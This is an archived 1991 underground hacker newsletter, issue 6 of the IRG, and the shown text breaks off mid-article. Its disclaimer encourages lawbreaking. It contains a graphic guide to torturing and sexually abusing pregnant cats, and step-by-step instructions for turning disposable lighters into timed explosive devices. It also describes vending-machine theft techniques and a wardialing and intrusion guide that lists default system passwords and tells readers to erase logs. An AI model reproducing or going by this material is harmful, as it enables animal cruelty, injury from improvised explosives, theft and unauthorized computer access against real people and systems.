home *** CD-ROM | disk | FTP | other *** search
/ Hacker Chronicles 1 / HACKER1.ISO / miscpub1 / irg_06.txt < prev    next >
Text File  |  1992-09-26  |  60KB  |  1,307 lines

  1.                  //////     ///////     ////////
  2.                   //       //    //    //
  3.                  //       ///////     //   ////
  4.                 //       //    //    //     //
  5.              //////     //     //   /////////
  6.              
  7.      
  8.      
  9.     International Rogues Guild and Shadow/Net Presents...            
  10.     IRG Newsletter v6.00              Released: 2/20/91 
  11.     Written by: Haywire               Edited by: Haywire
  12.         
  13.         Hi everyone,
  14.                 Heres IRG number 6 for ya, more people are getting interested
  15. and I am happy about it.  Theres alot of good stuff this time(like always,
  16. hehe) so read up.  
  17.  
  18.  
  19.  
  20.  5.01 Table Of Contents
  21.  ----------------------
  22.  5.01...................................Table Of Contents              
  23.  5.02...................................Disclaimer
  24.  5.03...................................More About IRG
  25.  5.04...................................CyberPunk Follies
  26.  5.04b..................................State Of The Union Reply by Psycho
  27.  5.05...................................Letters From Prison
  28.  5.06...................................Planned Parent Hood For Cats by Damaged
  29.  5.07...................................Disposible Lighter Bombs by Psycho
  30.  5.08...................................Vending Machine Revenge by Psycho
  31.  5.09...................................The Art of Scanning by Control-S
  32.  5.10...................................Hacking CompuServe by Control-S
  33.  5.11...................................Dos Trips by Wasteland Warrior
  34.  5.12...................................Running The ShadowNet
  35.  5.13...................................VMB's From Hell
  36.  5.14...................................Hellos and Goodbyes 
  37.                              
  38. 5.02 Disclaimer
  39. ---------------
  40.         All items in this newsletter are meant for informational purposes. 
  41. It is written to encourage illegal activities, I hope the reader is inspired
  42. to break the law after reading all IRG Information.  Of course the authors of 
  43. this newsletter cannot be held for anything that the reader does.
  44.         WARNING: Remember ALL explosives are dangerous, DO NOT, I repeat, DO
  45. NOT mess around with any of the recipes for explosives, EVER!  These recipes
  46. are real, they can kill you, and anyone else.  Make sure you know what you're
  47. doing.  Otherwise its your fault.
  48.  
  49. 5.03 More About IRG
  50. -------------------
  51.         We have one new ShadowNet member this issue and a new journalist.
  52. Hopefully you people are getting the idea and starting to write things for ANY
  53. group, just sharing the wealth of info out there.  Until next time...
  54.  
  55.  
  56.             IRG Members              Rank
  57.             -----------             ------
  58.             Haywire                 IRG and ShadowNet Leader
  59.             Wasteland Warrior       Part Time Programer,Game Winner,IRG Member
  60.             Psycho                  (615)ShadowNet Member
  61.             Dr. Digital             (619)ShadowNet Member
  62.             Damaged                 IRG's "Sick" Member
  63.                 
  64.             Journalist
  65.             ----------               
  66.             Haywire
  67.             The Spectral Demon
  68.             Control-S
  69.             Kryptic Night
  70.             Psycho
  71.             Damaged
  72.             Wasteland Warrior
  73.                 
  74.         Thats about it, if you feel like becoming a member of either IRG or
  75. ShadowNet.  Please call one of the IRG nodes.  If you would like to become and
  76. IRG node again contact one of the IRG nodes.
  77.  
  78.  
  79. 5.04 CyberPunk Follys
  80. ---------------------
  81.         I have only gotten one reply to my "State Of The Union" speech, it
  82. seems that either people don't care what I say or they areto lazy to call up my
  83. board and give me a response.  It seems that the Hacking community has
  84. turned to shit more then I had thought.  But maybe people will get the idea one
  85. day and move on to a higher level.
  86.  
  87.  
  88. 5.04b State Of The Union Reply by Psycho
  89. ----------------------------------------
  90. In response to Haywire's "State of Hacking Today" editorial in IRG #05, I would
  91. like to make the following comments:
  92.  
  93. I agree with Haywire 100%- This shit over "Hacker Wars" has gotten WAY out of 
  94. hand... What in the hell is wrong with people?!? Isn't hacking supposed to be a
  95. means by which we SHARE information and spread the wealth of knowledge? We 
  96. hackers have before us an incredible realm of POWER- This has been exhibited 
  97. time and time again; Everytime you hear of some kid who hacked into NASA or 
  98. someplace and got caught, there are probably dozens more getting away with 
  99. something just as spectacular.
  100.  
  101. In short, we have the ability to manipulate and control the flow of ALL manner 
  102. of electronic information. The authorities are starting to realize the actual 
  103. scale to which systems can be hacked into, but it is far too late to do 
  104. anything about it. For every hacker that gets busted, five more take his place-
  105. and it's a never-ending cycle.
  106.  
  107. United and working together as one, hackers have the propensity to virtualy 
  108. control (or shut-down) many facets of our society on a GLOBAL scale: banking, 
  109. sattellite communications, military, law enforcement, etc., etc.... But instead
  110. of working together, the hacker community is splintered into many factions, all
  111. more or less working against each other. Instead of liberating information for 
  112. all, we are instead battling it out in our own little area codes, searching for
  113. short-lived fame.
  114.  
  115. I'm not saying that we should shut down all systems and holds the world's data 
  116. for ransom; That would be futile. Instead, we need to help educate those with 
  117. an interest in hacking but lack experience. Not that we should toss info out to
  118. anyone- There are still (and always will be) certain type of people that "just 
  119. don't get it"... A little information and a lot of stupidity can be a dangerous
  120. thing with this type of "wanna-be". By a careful process of weeding out these 
  121. types, the data will begin to flow into the hands of those that can best put it
  122. to use.
  123.  
  124. So, in 1991, let's try to unify and SHARE our expertise- And I think you'll 
  125. find that the hacking/phreaking community will benefit from this like never 
  126. before. Hats off to Haywire and everyone else involved with the IRG for 
  127. publishing this fine newsletter and making an effort for change.
  128.  
  129.                                                              -Psycho
  130.  
  131. 5.05 Letters From Prison
  132. ------------------------
  133.         I have been getting alot of stuff, this issue and I am very happy about
  134. it.  The more the better, it always seems like I never have enough stuff.  This
  135. issue is pretty long getting into alot of good stuff.  This is a great issue
  136. check it out...
  137.  
  138.  
  139. 5.06 Planned ParentHood For Phelines by Damaged
  140. -----------------------------------------------
  141.  
  142.  
  143.                           Phile #1 of a series Unknown
  144.  
  145.  
  146.                           @-@-@-@-@-@-@-@-@-@-@-@-@-@-
  147.                           -                          @
  148.                           @  Planned ParentHood for  -
  149.                           -                          @
  150.                           @         Phelines         -
  151.                           -                          @
  152.                           @-@-@-@-@-@-@-@-@-@-@-@-@-@-
  153.  
  154.                                    WRiTTEN BY:
  155.  
  156.                                      Damaged
  157.                                      2.14.91
  158.  
  159.  
  160.   iNTRO 
  161.  
  162.    Ok dudes this is my phirst seriers of Anrkey philes on Kat's.  Don't you
  163.   just hate those little pussy's, i sure in the hell do.  Anyways,  the phile
  164.   is all How to do it yourself Home Kat abortions.  Why the reason for kats,
  165.   well i hate the goddamn shitheads for specific reasons.  That i won't get
  166.   into.  Well enjoy the phile and have phun.
  167.  
  168.  
  169.   SHiT YA'LL NEED 
  170.  
  171.   Propane torch
  172.   Koat Hanger
  173.   Gloves    <should be able to resist heat>
  174.   Rope                <optional>
  175.   Nails               <optional>
  176.   Hammer              <optional>
  177.   Drugs
  178.   & a Kat of kourse
  179.  
  180.  
  181.   GET'N STARTED 
  182.  
  183.    Ok, now get the above required stuff.  Now toke a little, phry or whatever
  184.   get's ya going.  Phirst off take the koat hanger and bend it into a phairly
  185.   straight wire.  Take the koat hanger and make a noose on one end.  You need
  186.   to make sure that the noose is small enuf to phit into da Kat's Kunt.
  187.  
  188.   PHUN PART 
  189.  
  190.    Ok now go out and phind yer victim.  Well you have phound a kat, put on
  191.   the gloves so you don't get scratch to hell and back.  Now this is where
  192.   the optional shit komes in.  You kan either Nail the phucker to the ground
  193.   by hammer'n nails thourgh it's pheet.  This technique i phind to be the most
  194.   effective.  Or if your one of those squemish types (why the phuck are you
  195.   read'n this then??) you kan use the rope.  Just spread the phucker's legs
  196.   to the phour korners.  Tie the rope around each paw and tie to something
  197.   else.  Now you have the kat down supplied and bagged.  Reach over and grab
  198.   your nice instrument(koat hanger) and also grab the torch.  Now you should
  199.   be still wear'n the gloves, if not jack'n off will be a little harder phor
  200.   you to do now.  Anywayz, heat up the end of the noose with the oval end or
  201.   however the phuck you made it.  Wait until the shit is shine'n real bright
  202.   orange or yellow.  Some koat hangers will even turn white, now make sure
  203.   you don't melt the damn noose. duh  Insert the heated end of the noose into
  204.   the kat's kunt, now jam the phucker all around, make sure you get every last
  205.   one of those bastard kittens outta there.  After you have phinished, unnail
  206.   or untie the kat.  Now i doubt it will walk away, but if you know who owns
  207.   that kat, be a phriendly neighbor and drop it off at their house phor them.
  208.   Now you really don't know which Kat is or not pregneat so hell try evey one
  209.   of those pussy's.  Now this also works for dogs, and even try this on yer
  210.   girlphriend if you even knock her up.
  211.  
  212.  
  213.   OTHER SiCK SHiT 
  214.  
  215.    Now some other phun shit to do while do'n this.  Bring along a tape recorder
  216.   or a kamcorder and record the shit.  Go home listen or watch it over and
  217.   over again.  Loads of phun dude.  Now for you sick perverts,  take a knife
  218.   and just make the kat's kunt big enuf to slide yer dick in, hell a phree
  219.   phuck.  You kould also bang the phucker up the ass to if ya wanted.  The
  220.   best part about this is that it's like bust'n a virgin everytime and you
  221.   don't have to wear a kondom either!  Oh yea while ya do this phry really
  222.   hard too.
  223.  
  224.   Yo'S & PHUCK oFF'S 
  225.  
  226.   Yo's to LoL-PHUCK, THG for thier latest kracks, Sam Brown for all his nice
  227.   back doors to Emulex, METALLiCA, Lutzifer, and all who think that they deserve
  228.   some yo's (yea right)
  229.  
  230.   Phuck off's to PE Give it up, THG got yer ass Kicked, Acid Alliance, QSD
  231.   lamers, Alto's you need to UPGRADE big phuck'n time, leeches, and all those
  232.   K-Rad K0de KiDZ who do noth'n but phuck'n leech as hell and get Kaught too.
  233.  
  234.  
  235.   KALL THESE KiCK'N SiSTEMS 
  236.  
  237.     Insanity Lane..........619.591.4974     -=> IRG HQ <=-
  238.     Zanaphopia.............404.642.8703     -=> AoA HQ <=-
  239.     The Corrupt Society....619.630.8450     -=> NHA HQ <=-
  240.     Demon's Crypt..........516.791.1427     -=> SoC HQ <=-
  241.     Phreak Accident........404.977.4272
  242.  
  243.  
  244.   Latur dudes
  245.       Damaged
  246.  
  247.  
  248. [--------------------------------- EOF ----------------------------------]
  249.  
  250.  
  251. 5.07 Disposable Lighter Bombs
  252. -----------------------------
  253.  
  254.                                 **************
  255.                                 *            *
  256.                                 * Disposable *
  257.                                 *   Lighter  *
  258.                                 *    Bombs   *
  259.                                 *            *
  260.                                 **************
  261.  
  262.                                    by PSYCHO
  263.  
  264.                         Written EXCLUSIVELY for The IRG
  265.  
  266.  
  267.  
  268. For those of you who are budding anarchists or Mad Bombers, but don't feel
  269. comfortable cooking up nitroglycerine in your mom's kitchen or making pipe
  270. bombs in the garage, here's a fairly decent alternative that is safe, easily
  271. transported, cheap, and effective if used properly.
  272.  
  273. All you need is a good supply of those shitty disposable lighters, like a Bic
  274. for instance. These can be bought cheaply (or stolen, if you're so inclined) at
  275. every damn convenience store between here and East Camelfuck, Iraq. Prices 
  276. range from about 39 cents for averaged-sized lighters, up to about $1.79 for 
  277. the extra-large ones, such as the Cli-Cla (my personal favorite- it is a HUGE
  278. disposable, holding about 65% more butane than the large Bic! They're available
  279. at fine truck stops everywhere...). Here is a chart to help you decide which
  280. lighter is best for your explosive needs:
  281.  
  282.         Lighter                   | Size of Explosion *
  283.        ---------------------------|----------------------------------
  284.         Mini Bic                  | Small; 4 to 6 inch fireball
  285.                                   |
  286.         Scripto                   | Medium; 6 to 12 inch fireball
  287.                                   |
  288.         Regular Bic               | Large; 12 to 18 inch fireball
  289.                                   |
  290.         Cli-Cla                   | HUGE; 24 to 30 inch fireball
  291.        --------------------------------------------------------------
  292. *(NOTE: These sizes are only an APPROXIMATION based on past observances-
  293.         fireball size and intensity may be affected by such factors as 
  294. atmospheric pressure, wind speed, humidity, manufacturing defects, etc. 
  295. Your results will vary.)
  296.  
  297. As you can see by the above chart, some of these lighters can be quite 
  298. powerful. To give you a better frame of reference, consider the Mini Bic to be 
  299. as powerful as an average firecracker, the regular Bic as powerful as an M-80 
  300. firecracker ( a REAL M-80... You can only get them illegally in this country- 
  301. they are equal to 1/4 stick of dynamite), and the Cli-Cla as powerful as 1/3 to 
  302. 1/2 stick of dynamite, under perfect conditions.
  303.  
  304.  
  305.                      PREPARATION AND METHODS OF DETONATION
  306.  
  307. To prepare a lighter for use as an explosive device, the only real modification 
  308. that must be made is the removal of the flame guard. The flame guard is the 
  309. semi-elliptical piece of metal that is found on top of the lighter which 
  310. encases the gas jet and flame adjustment mechanism (if present). This is easily 
  311. removed by using a screwdriver (or even a finger) to pry away one edge of the 
  312. flame guard, and thus popping the whole thing loose.
  313.  
  314. With the above out of the way, you are ready for the placing of the device. 
  315. Keep in mind that since the laws of physics declare that a force will always 
  316. follow the path of least resistance, some forethought should go into the 
  317. placement of the device for best results. If you just want a purely-for-the-
  318. hell-of-it explosion, the lighter can be placed on open ground, but for a 
  319. specific purpose, such as the destruction of an object, opening of a door, 
  320. etc., the lighter will need to be wedged as tightly as possible against the 
  321. target.
  322.  
  323. The only "timing device" you will have, such as it is, is the actual flow of 
  324. gas from the lighter. Some lighters have no flame adjustment mechanism, and 
  325. thus you have very little control over when the explosion will take place. On 
  326. lighters where the control is present, you will be able to approximate the 
  327. point at which detonation will occur. This is accomplished by turning the 
  328. adjustment wheel toward the <+> or <->, with the <+> side naturally exploding 
  329. faster. In some lighters, the maximum <+> setting can be over-ridden to allow 
  330. the butane to escape very quickly, but keep in mind that the faster the gas 
  331. escapes, the lower the power of the resulting explosion. You may find some 
  332. experimentation necessary with different types of lighters you plan to use      
  333. before you can become familiar with the approximate detonation times.
  334.  
  335. Once you have decided on a target and length of time needed to escape and/or 
  336. take cover, you are now ready to ignite the lighter. The most important element 
  337. to keep in mind it that the gas release lever MUST remain depressed for the 
  338. duration of time until the explosion occurs. There are many methods for 
  339. assuring this, as pointed out below:
  340.  
  341.     A. Wedge the lever in the open position by placing an object between it and  
  342.  
  343.    the striking wheel.
  344.  
  345. B. Glue the lever down with a glob of Crazy Glue.
  346.  
  347. C. Tape the lever down with aluminum strapping tape (regular tape will not   
  348.    work due to rapid melting).
  349.  
  350. D. Wire the lever down with a few inches of light-gauge copper wire.
  351.  
  352. These methods are not the only absolute choices you have, but I have always had 
  353. good luck with them.
  354.  
  355. Once the lever has been secured, you need to act as quickly as possible, to 
  356. ensure as little butane as possible is wasted. Using another lighter, ignite 
  357. the stream of gas escaping from the one you want to explode. Another factor you 
  358. might want to consider for timing is the physical direction of the tank of the 
  359. lighter in relation to the flame- If the flame is above the tank (as in normal 
  360. operation), it will take much longer for the heat to melt the plastic and cause 
  361. the detonation than it would if the tank was placed at a 45-or-so degree angle 
  362. with the flame being BELOW the tank. Here is a chart of approximate times based 
  363. on positioning of lighter and gas flow:
  364.  
  365.  
  366.                Gas    |   Lighter Upright   |  Lighter Inclined
  367.                Flow   |  (flame above tank) | (flame below tank)
  368.               ==================================================
  369.                MIN.   |     5-10 minutes    |     3-5 minutes
  370.               --------|---------------------|-------------------
  371.                MED.   |     3-5  minutes    |     1-3 minutes
  372.               --------|---------------------|-------------------
  373.                MAX.   |     1-3 minutes     | 60 seconds or LESS
  374.  
  375. Again, these figures are APPROXIMATE- Times will vary according to many factors 
  376. including, material used in manufacture, quality of butane, etc.
  377.  
  378. Using the above chart as a guide, plus some experimentation on your own, you 
  379. should be able to discern timing factors relating to your individual needs in 
  380. certain situations. Of course, lighting the butane and allowing it to melt the 
  381. plastic tank casing is not the only method for detonating disposable lighters-
  382. other possibilities include:
  383.  
  384.     * Affixing a large firecracker or other small explosive device to the tank
  385.  
  386. * Placing the lighter in an open flame (campfire, fireplace, etc.)
  387.  
  388. * Placing the lighter on, in, or near a heat source (engine block, tail 
  389. pipe, oven, space heater, etc)
  390.  
  391. As you can see, however and wherever you choose to use a lighter as an 
  392. explosive, it is a cheap and (usually) ample solution. Always use great care 
  393. and common sense when handling ANY explosive device, and have your escape route 
  394. or cover picked out well in advance. Also be aware that, due to the materials 
  395. used in it's construction, an exploding lighter will hurl bits of metal and 
  396. molten/flaming plastic, sometimes for several yards in all directions.
  397.  
  398.                                 HAPPY BOMBING!
  399.  
  400. Thanks to: Haywire & The MIGHTY IRG!
  401.  
  402. Special Thanks to: The Phantom Fireman for his pyromania expertise.
  403.  
  404.  
  405. 5.08 Vending Machine Revenge
  406. ----------------------------
  407.  
  408.  
  409.                             VENDING MACHINE REVENGE
  410.  
  411.  
  412.                                    by Psycho
  413.  
  414.                               Written for the IRG
  415.  
  416.  
  417.  
  418. How many of you have ever been ripped off by a vending machine? I would guess 
  419. that EVERYBODY, at one time or another (and probably MANY times), has met up 
  420. with a "change eater". This can be frustrating as hell, especially if you're 
  421. hungry or thirsty and the machine took all the change you had. Worst of all, 
  422. many times the owner of the machine takes his sweet time getting it fixed- 
  423. After all, any money you lose is pure profit for him. The following is a 
  424. collection of various techniques that have been used with great success to 
  425. extract revenge on these money-grubbing bastards, and can put a few bucks in 
  426. your pocket as well. I guess some unscrupulous person COULD use this 
  427. information just to rip off other hapless consumers, but that is their 
  428. discretion (ha ha!).
  429.  
  430. 1.0 SLUGGING
  431.     This is one of the most common forms of Vending Machine Revenge (from 
  432. herein referred to as VMR), and also one of the safest. Basically this 
  433. involves putting something into the machine that is not a coin, but the 
  434. machine will think it is. Experimentation of a high degree will be in order 
  435. here, as all machines have different levels of sensitivity. Some of the 
  436. more common items used include: metal washers, arcade tokens, foreign 
  437. coins, plastic discs, etc. I think you get the idea. I have even heard of 
  438. people using a bench grinder to file pennies down to dime size, but that 
  439. seems like an awful lot of work for 9 cents, but how you want to spend your 
  440. time is up to you. Again, you'll have to experiment a lot with this one. If 
  441. anyone finds some that work particularly well, leave me a message on the  
  442. IRG/Insanity Lane node, and I'll draw up a chart for a future issue.
  443.  
  444.  
  445. 2.0 TIPPING
  446. Another quite popular method, this is accomplished by physically tipping 
  447. the machine forward as far as you can get it, hence the name. This works 
  448. best on those machines that have potato chips and stuff dangling from long 
  449. metal rods, and also those that use spiral rods to hold the stuff. If you 
  450. want to use this method of VMR to the fullest, it's best to take along a 
  451. couple of stout friends. Reason being, you will get the best results by 
  452. practically putting the front of the machine down to the floor, and some of 
  453. these bastards can be REAL heavy. So, DON'T try this one alone (unless you 
  454. look like Arnold Schwarzeneggar), and make sure you do it quietly and in an 
  455. out of the way area to avoid getting caught.
  456.  
  457. 3.0 ROCKING
  458. The Rocking method for VMR is similar to the above, but is seems to work 
  459. best on coke machines which dispense cans. To get free cokes, you rock the 
  460. machine back and forth, really banging the hell out of it. This confuses 
  461. the machine's coin mechanisms, and it will usually start spitting out 
  462. cokes. This VMR method will also require the assistance of friends, for 
  463. obvious reasons (coke machines are the heaviest of all vending machines). 
  464. This one must also be executed in a very deserted place, due to the 
  465. excessive noise level created. You'll also want to remember to take along 
  466. some backpacks, pillowcases, etc., to put your free cokes in. I have seen 
  467. machines completely emptied using this method.
  468.  
  469. 4.0 PLUGGING
  470. So far, we've only discussed methods with which you can obtain free snacks- 
  471. Now, here's one that can net you some good pocket change. Unfortunately, 
  472. this will only work as described on newer coke machines. Perhaps with 
  473. experimentation, it can be adapted for use on other machines. Plugging is 
  474. accomplished by doing just that- you use something which will get hung in 
  475. the coin slot, such as a penny, slug, etc., but will still fall through 
  476. when the coin return is pressed. On newer coke machines, the coin return is 
  477. a long piece of horizontal metal that presses straight down. After 
  478. inserting your plug, use a flat-blade screwdriver to bend the coin return 
  479. bar so that it cannot be depressed. Now, take the rest of the day off and 
  480. do whatever. When you return later that night, use your screwdriver to bend 
  481. the return lever in the other direction. When you press it down- JACKPOT! 
  482. You get all the coins that other people have "lost" that day. Rotate among 
  483. different machines, and don't plug the same one more than once a week to 
  484. obtain best results. By doing this to enough machines in various locations, 
  485. it's possible to make around $100 PER DAY (the average take for one machine 
  486. is usually around $5). Another good place to do this occasionally is coke 
  487. machines in expensive hotels, since they usually inflate the price of their 
  488. drinks by 50% over normal machines. Be extremely careful and don't get TOO 
  489. greedy, and this method is very safe.
  490.  
  491. 5.0 JAMMING-1
  492. This type of VMR is one of the best for getting lots of free stuff. What 
  493. you do is actually jam the "product chute" (where the goods come out). Any 
  494. manner of things can be used to do this. For instance, open the little door 
  495. on a coke machine where the cans come out. Now, take a stick, huge wad of 
  496. paper, etc., and cram it as far up into the machine as you can comfortably 
  497. reach. This will block the arrival of anyone's purchase, and you only have 
  498. to pull out whatever you blocked it with on your return to retrieve the 
  499. stuff. On cigarette machines, you can even put tape over the side slot 
  500. where the smokes are dispensed to accomplish this. As in some of the above 
  501. methods, experimentation will be in order here to learn about the machines 
  502. in your area. This is a fairly safe method of VMR.
  503.  
  504. 6.0 JAMMING-2
  505. This is the same as the above method, but instead you jam the change return 
  506. slot. It's not as profitable as screwing up the coin return, but hey- it's 
  507. FREE money. You may have to use a small wire to accomplish this on machines 
  508. that have a small door that opens inward on the change slot. Again, if done 
  509. smartly and not too often to the same machine, this VMR method is safe.
  510.  
  511. 7.0 ZAPPING
  512. Personally, I have never been able to get this one to work, but I know 
  513. people that swear by it and say they use it all the time. Also known as 
  514. "shorting", this type of VMR involves locating the socket where the machine 
  515. is plugged in, and rapidly working the plug back and forth, causing the 
  516. electronics in the machine to screw up. I'm told it only works on machines 
  517. that have an LED display showing the amount you've dropped in. One person 
  518. claims to have "maxed-out" the display at $9.99 and got that much OUT of 
  519. the machine when he hit the coin return! Like I said, I've never been able 
  520. to do this, but there are lots of people who claim it can be done. 
  521. Experiment and find out for yourself, and drop me a line if you get it to 
  522. work.
  523.  
  524. 8.0 KILLING
  525. This isn't as drastic as it sounds- It actually means that you unplug the 
  526. machine, thus "killing" the power to it. Some machines, when unplugged, 
  527. will simply NOT return any coins. And, you'd be surprised at how many 
  528. people will go ahead and stick money in a machine, even if it's not lit 
  529. up... And most people won't look for the plug to check it, either. This is 
  530. a very safe, quiet method that has been proven to work on certain machine. 
  531. As before, experiment with machines in your local area.
  532.  
  533. Well, that should be enough ideas to get you started- I'm sure there are many, 
  534. many more. If you have a particular favorite, leave me e-mail on Insanity Lane 
  535. and I'll include them in any future updates of this article. In the meantime, 
  536. just remember not to get too greedy, and you can have a tidy little income from 
  537. your VMR exploits.
  538.  
  539. Thanks go to: Haywire & the IRG for publishing the newsletter and allowing me
  540.               to write this article.
  541.  
  542. Special thanks to: The Bubblegum Bandit, H.R. Puffenstuf, & Headhunter for    
  543.                    their input in compiling this article.
  544.  
  545.  
  546. 5.09 The Art Of Scanning by Control-S
  547. -------------------------------------
  548.  
  549.  
  550.                      +++++++++++++++++++++++++++++++
  551.                      ++                           ++
  552.                      ++        The Art Of         ++
  553.                      ++    *->> Scanning <<-*     ++
  554.                      ++                           ++
  555.                      ++       By: Control-S       ++
  556.                      ++                           ++
  557.                      +++++++++++++++++++++++++++++++
  558.  
  559.  
  560. This file is written for International Rogues Guild (IRG), and is
  561. the second in a series of files aimed towards the begining hacker.
  562. If you've been around a while, you will most likely find nothing
  563. of use here.
  564.  
  565.  
  566. Part 1: Scanning, the art of
  567. Part 2: Scan-Pages v1.00
  568.  
  569.  
  570. Disclaimer: This phile is for informational purposes only, and I
  571. cannot be held responsible for the actions of anyone reading it.
  572.  
  573. WARNING: If the words "k-kewl", "d00d", or "k-elyte" are a part of
  574. your every day vocabulary, stop reading now, you are to far gone for help. 
  575.  
  576.  
  577. Scanning:
  578.  
  579. Scanning is one of the most legal aspects of hacking, and a lot of fun too.
  580. I'm not saying that scanning IS legal, I really doubt you could get anyone
  581. to answer that question. If the SS wants to bust you, they will do it for
  582. scanning, or anything else they feel like, if theres no law against it,
  583. they will make one up! You can't win, so I would just recommend that you
  584. watch your step no matter what you do.
  585.  
  586. You can scan many diferent places, like x25 networks such as TymNet and
  587. Tele(Sprint)Net or simply telephone exchanges, which is what I'll be 
  588. going into here: Scanning your local exchanges, I basically view this as
  589. 'getting to know your neighborhood' - its good to get an idea of how 
  590. many modems are in yer area, and just what sort of 'puters are connected
  591. to them. You'll more than likely come across a few Unixes, and some VMS',
  592. if you're lucky, you'll find a LAN or WAN, and be able to reach a bunch
  593. of different systems from one number, some of these even connect to far
  594. systems, some with outdials (which you can scan other areas through), or
  595. gateways (where you can hook into even more systems and/or psn's). 
  596.  
  597.  
  598.  
  599. Things You Need:
  600.  
  601. *Personal Computer -  (almost any type) (Amiga recommended)
  602. *Modem - (any baud) (at least 2400 recommended)
  603. *A Wardialer or Scanning program - These are available for just about
  604.  every type of computer, but if you can't find one, they are easy to
  605.  write yourself, in either basic or even scripting. (I would highly
  606.  recommend you write your own, its a good way to get started programming
  607.  and you can customize it to do exactly what you want it to.)
  608. *References - You should have on hand (or commited to memory) some
  609.  text files or manuals that will help you identify the systems you find,
  610.  and then give you and idea of how to get in and possibly use them.
  611.  (You can find detailed 'how to' files on just about any operating
  612.  system you might find in many Phrack newsletters, if you don't have
  613.  them all, get them!) - (See appendix A of this file for simple system
  614.  identification).
  615. *A little common sense - sorry, you're on your own with this one.
  616.  
  617.  
  618. Getting Started:
  619.  
  620.  
  621. Using that little bit of common sense, you should fire up your computer
  622. and modem. (If you can't get by this part, you should stop reading this
  623. file immediately, run down to your nearest computer store, and trade
  624. your PC in for a nintendo!)
  625.  
  626. For best results, you will want to do some sort of sequential scan, this
  627. way you won't miss any carriers. If you are paranoid about leaving a
  628. sequential patern, (the SS looks for this sometimes, trying to catch
  629. 'c0dez kidz') then you will have to make some part of the dialing random.
  630. Making the whole scan random has a few problems; if you wan't to make sure
  631. you get all of the numbers, and don't keep going over the same ones, you
  632. have to keep track of all the numbers dialed and check it every time
  633. before dialing. This is a big waste of time, the best way to do a sequential
  634. scan without a patern, is to use a node dialer. Node dialers are common
  635. in code hacking programs, and these are easilly modified to just scan.
  636. The ideal configuration for a node dialer (the one I use) would be to
  637. use 10 nodes, each scanning 1000 numbers in the same exchange, then just
  638. randomize which node is dialed.
  639. Example:
  640.  
  641. Node 1 Dials 0000->0999
  642. Node 2 Dials 1000->1999
  643. Node 3 Dials 2000->2999
  644. Node 4 Dials 3000->3999
  645. Node 5 Dials 4000->4999
  646. Node 6 Dials 5000->5999
  647. Node 7 Dials 6000->6999
  648. Node 8 Dials 7000->7999
  649. Node 9 Dials 8000->8999
  650. Node10 Dials 9000->9999
  651.  
  652. ATDT <prefix>+<random node>
  653.  
  654. This method is just as fast as dialing them straight out, you don't
  655. miss any numbers, re-dial any numbers, and you aren't using any
  656. detectable dialing pattern (other than possibly 300 calls per hour).
  657.  
  658.  
  659. Now that you've got your dialer configured, you need to find a good time
  660. to scan. Again, if you're paranoid, you should stick to scanning
  661. between 9AM and 5PM. This is for two reasons; 1) This is the when most
  662. buisness calls are made, and in the huge volume, you will be that much
  663. harder to detect. 2) If you DO get busted (can you imagine going to court
  664. for such a thing? hah!) you will have a good case, as many people dial
  665. sequential numbers durring this time, (re: telemarketers, surveys...).
  666. This is also probably the time when you'll be at work/school/whatever,
  667. so you won't be needing your CPU. (I personally scan while I'm asleep,
  668. at night - I'm not that paranoid!) As a rule of thumb, don't watch the
  669. dialer. For some reason, no carriers are detected while you watch the
  670. scan in process. (I've heard rumors that this is the result of a minor
  671. disturbance in the local space-time-continuum caused by invisible 
  672. emissions from the iris, but have seen no proof to back this theory.)
  673.  
  674. Okay, now you have your dialer ready and a good time to scan. Fire it
  675. up and check on the progress every few hours. After you scan out a fair
  676. sized list of carrier signals, you should give the dialer a rest, boot
  677. your favorite term program, and investigate all your finds. Don't expect
  678. to see something like this: "Welcome SysOp!" on the systems you check, 
  679. in fact, expect nothing. Many systems don't wave any banners or tell
  680. you anything, you have to try and coax a responce out of them. Things
  681. to try would be: <Carriage Return>'s, Ctrl-C, or any other Ctrl-'s,
  682. (if you send a Ctrl-S, be sure to send a Ctrl-Q after it, because many
  683. systems use this as a 'halt-output' switch, and you may discover the
  684. right keys to press, but never know it because all output is stopped.
  685. Try sending "..." or @'s, [Esc], and sending a hard break almost always
  686. gets some responce, if none of the above work, try any character on 
  687. the keyboard, and words like "boot, start, run, load, logon, login".
  688. If you have an external modem, keep an eye on the "Recieve Data" light,
  689. if it flickers and you aren't getting anything echoed to your screen,
  690. or possibly a lot of garbage characters, switch to 7E1, or call back
  691. at a lower baud rate. (I've found a bunch of systems with modems that
  692. will connect you at 2400, but the com ports will only transfer data
  693. at 1200 or 300) If you try everything and can't get any responce at all,
  694. it could be a company which turns its computers off at night, but
  695. leaves the modem on (so call back in the day), a crashed system, or
  696. a hacker who got your scan-call at 3am and wistled an unerring 8N1
  697. into his reciever at a steady speed of 2400 bits per second. -heh
  698.  
  699. When(if) you identify the operating system, break out your references,
  700. and try all the default accounts. If you get in on a default, but
  701. you're unfamiliar with the particular OS, don't mess around, just log
  702. off and do a little research, learn how to turn off all the logging and
  703. cover your tracks, then go back and have phun to your hearts content.
  704.  
  705. Remember: keep notes on all the systems you find. You never know when
  706. some ancient OS might come in handy, or what you might find that
  707. relates to any system while trashing at a later date!
  708.  
  709.  
  710.  
  711. Apendix A:
  712.  
  713. The following is a short chart to help you identify operating systems.
  714.  
  715. System     Prompt                Default Accounts/Passwords
  716. ---------  --------------------  -------------------------------------
  717. Unix       login: -or- Login:    root,daemon,bin,sync,uucp/(unpassworded)
  718.  
  719. VAX        Username:             SYSTEM/MANAGER -or- FIELD/SERVICE
  720.  
  721. DEC-10     User ID:              1,2/ ?
  722.  
  723. HP-?000    PLEASE LOG IN:        HELLO,MANAGER,
  724.  
  725. Iris       ACCOUNT ID?           MANAGER
  726.  
  727. VM/CMS     IBM VM/370 ONLINE     logon (user id)
  728.  
  729. NOS        FAMILY:
  730.  
  731. Primos     "PRIMENET XX.X.XXX"   login SYSTEM/SYSTEM -or- OPERATOR
  732.  
  733.  
  734.  
  735. * This hardly all-inclusive, only the ones I know from memory, you should
  736.   try and compile your own list, and add new systems to it regularly.
  737.  
  738.  
  739.  
  740.    This has been a phree Speech publication, (C) pSp and IRG 1991
  741.  
  742.  
  743. As usual, I can be contacted for whatever on any of the IRG nodes, or
  744. IRG e-mailing addresses. Please mark all comments "Attn: Ctrl-S".
  745.  
  746.  
  747.               Control-S, Freelance G-File Artist (for hire)
  748.  
  749.  
  750.  
  751.  
  752.  
  753.  
  754. Scan-Pages v.99b:
  755.  
  756. Note: Unfortunately, I will be unable to finish my current scan in time
  757. for the next IRG release, so I stuck this partial scan in to fill the 
